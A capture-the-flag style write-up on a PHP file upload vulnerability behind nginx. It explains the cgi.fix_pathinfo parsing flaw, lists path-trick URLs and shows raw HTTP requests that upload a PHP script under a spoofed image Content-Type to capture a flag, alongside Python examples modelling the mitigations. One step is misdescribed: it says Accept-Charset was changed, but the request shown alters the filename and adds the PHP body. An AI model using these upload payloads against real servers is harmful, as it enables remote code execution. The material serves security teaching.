A file upload vulnerability means that a user uploads an executable script file and, through that script, gains the ability to run commands on the server. File upload itself is not the problem; the problem is how the server handles and interprets the file after it has been uploaded.
Application scenarios
For file uploads, the following are the typical ways the feature gets abused:
- The uploaded file is a web script; the server's web container interprets and executes the user-uploaded script, resulting in code execution;
- The uploaded file is the Flash policy file crossdomain.xml, used to control Flash behaviour under that domain;
- The uploaded file is a virus or trojan, which the attacker uses to trick users or administrators into downloading and running it;
- The uploaded file is a phishing image or an image containing a script; some browsers will execute it as a script, enabling phishing or fraud.
Network preview: the target server is seen to be nginx.
Penetration approach: disguise the file extension and rely on the server's parsing vulnerability.
How the nginx vulnerability works
Nginx by default supports PHP through CGI (FastCGI); the common practice is to set SCRIPT_FILENAME in the nginx configuration file via a regular-expression match. When the URL www.xx.com/phpinfo.jpg/1.php is requested, $fastcgi_script_name is set to "phpinfo.jpg/1.php", which is then built into SCRIPT_FILENAME and passed to PHP CGI. But why does PHP accept such a parameter and parse phpinfo.jpg as a PHP file? This is where the fix_pathinfo option (cgi.fix_pathinfo in php.ini) comes in. If that option is enabled, the following logic in PHP is triggered:
PHP treats SCRIPT_FILENAME as phpinfo.jpg and 1.php as PATH_INFO, so it parses phpinfo.jpg as a PHP file.
Forms of the vulnerability:
- www.xxxx.com/UploadFiles/image/1.jpg/1.php
- www.xxxx.com/UploadFiles/image/1.jpg%00.php
- www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php
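The resolution step described above, modelled in Python as an added example (not PHP's or nginx's own code): fix_pathinfo_split mimics what PHP does with cgi.fix_pathinfo=1, stripping trailing path components from the requested SCRIPT_FILENAME until an existing file is found, and dispatch shows how two standard mitigations change the outcome, nginx "try_files $uri =404" (the exact URI must exist before anything is handed to FastCGI) and PHP-FPM "security.limit_extensions" (the resolved script must end in .php). The in-memory document root and the option flags are constructed for the example; the %00 and %20\0 forms above depend on null-byte handling in older PHP and are not modelled.

```python
# Added example: models PHP's cgi.fix_pathinfo=1 script resolution and two
# mitigations. Not PHP's or nginx's code; the document root below is constructed.

# Constructed document root: the uploaded image exists, 1.php does not.
DOCROOT_FILES = {
    "/UploadFiles/image/1.jpg",
    "/index.php",
}


def fix_pathinfo_split(uri, files=DOCROOT_FILES):
    """Mimic cgi.fix_pathinfo=1: strip trailing path components from the
    requested SCRIPT_FILENAME until an existing file is found. Returns
    (script, path_info); (None, None) when no prefix exists on disk."""
    parts = uri.split("/")
    for cut in range(len(parts), 0, -1):
        script = "/".join(parts[:cut])
        if script in files:
            rest = "/".join(parts[cut:])
            return script, ("/" + rest if rest else "")
    return None, None


def dispatch(uri, files=DOCROOT_FILES, try_files=False, limit_extensions=None):
    """Model an nginx 'location ~ \\.php$' block handing the request to PHP-FPM.

    try_files=True    models 'try_files $uri =404': the exact URI must exist
                      on disk before FastCGI is involved.
    limit_extensions  models PHP-FPM 'security.limit_extensions': the file
                      PHP finally resolves must carry one of these suffixes.
    Returns a short string describing what the server would do."""
    if not uri.endswith(".php"):
        return "static"            # served as a plain file, never executed
    if try_files and uri not in files:
        return "404"               # nginx refuses before FastCGI sees it
    script, path_info = fix_pathinfo_split(uri, files)
    if script is None:
        return "404"               # PHP finds no script at all
    if limit_extensions and not script.endswith(tuple(limit_extensions)):
        return "403"               # PHP-FPM answers "Access denied."
    return "execute " + script + " PATH_INFO=" + repr(path_info)


if __name__ == "__main__":
    req = "/UploadFiles/image/1.jpg/1.php"
    print("vulnerable:      ", dispatch(req))
    print("try_files:       ", dispatch(req, try_files=True))
    print("limit_extensions:", dispatch(req, limit_extensions=[".php"]))
```

Either mitigation alone stops the 1.jpg/1.php form; in practice both are set, since try_files protects the nginx side and limit_extensions protects the PHP side even when a different front end is used.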
Exploiting it: rename the file to 1.jpg.php and set the Content-Type field of the request body to image/jpeg.
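The server in this writeup accepts 1.jpg.php, and later 1.php, as long as the multipart part's Content-Type says image/jpeg. The following Python is an added example (not the challenge server's code) that contrasts that weak check with a stricter one: an extension allow-list, a magic-number check on the bytes, rejection of extra dots, path separators and NUL bytes, and a server-chosen random filename. The sample bytes are constructed.

```python
# Added example: the upload check the target in this writeup lacked. Not the
# challenge server's code; the file bytes below are constructed samples.
import os
import secrets

# Allow-listed extensions and the magic bytes each must start with.
ALLOWED_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def weak_check(filename, content_type, data):
    """What the writeup's target appears to do: trust the client-declared
    Content-Type of the multipart part and keep the client's filename."""
    return filename if content_type == "image/jpeg" else None


def strict_check(filename, content_type, data):
    """Return a server-chosen storage name, or None to reject.
    The content_type argument is deliberately ignored: it is client input."""
    # Reject paths, NUL bytes and double extensions such as 1.jpg.php,
    # 1.jpg%00.php (decoded to a NUL) or ../x.jpg.
    if "\x00" in filename or os.path.basename(filename) != filename:
        return None
    if filename.count(".") != 1:
        return None
    _stem, ext = filename.rsplit(".", 1)
    ext = ext.lower()
    magic = ALLOWED_MAGIC.get(ext)
    # The bytes must actually look like the claimed image type.
    if magic is None or not data.startswith(magic):
        return None
    # Never keep the user's name: pick a random one with the validated extension.
    return secrets.token_hex(16) + "." + ext


# Constructed samples: a minimal JPEG header and the PHP body from the writeup.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 12
PHP_SAMPLE = b"<?php\nphpinfo();\n?>\n"

if __name__ == "__main__":
    for name, data in (("1.jpg.php", PHP_SAMPLE), ("1.php", PHP_SAMPLE), ("photo.jpg", JPEG_SAMPLE)):
        print(name, "weak:", weak_check(name, "image/jpeg", data),
              "strict:", strict_check(name, "image/jpeg", data))
```

A magic-number check does not stop a valid image with PHP appended, so the upload directory must additionally be one that nginx never passes to FastCGI (a location with no fastcgi_pass), which is what makes the parsing trick above harmless even when a file slips through.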
With Burp Suite set up locally, send the request. Request:
POST / HTTP/1.1
Host: 103.238.227.13:10085
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------31440985419813
Content-Length: 199
Referer: http://103.238.227.13:10085/
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------31440985419813
Content-Disposition: form-data; name="file"; filename="1.jpg.php"
Content-Type: image/jpeg

-----------------------------31440985419813--
Response received:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Aug 2017 13:53:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.0.7
Content-Length: 15

é??????????????
At first glance the last line looks like the flag. Modify the request's Accept-Charset field and reload.
Request
POST / HTTP/1.1
Host: 103.238.227.13:10085
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------31440985419813
Content-Length: 208
Referer: http://103.238.227.13:10085/
Connection: Keep-Alive
Upgrade-Insecure-Requests: 1

-----------------------------31440985419813
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php
phpinfo();
?>
-----------------------------31440985419813--
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Aug 2017 14:32:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.0.7
Content-Length: 37

Flag:42e97d465f962c53df9549377b513c7e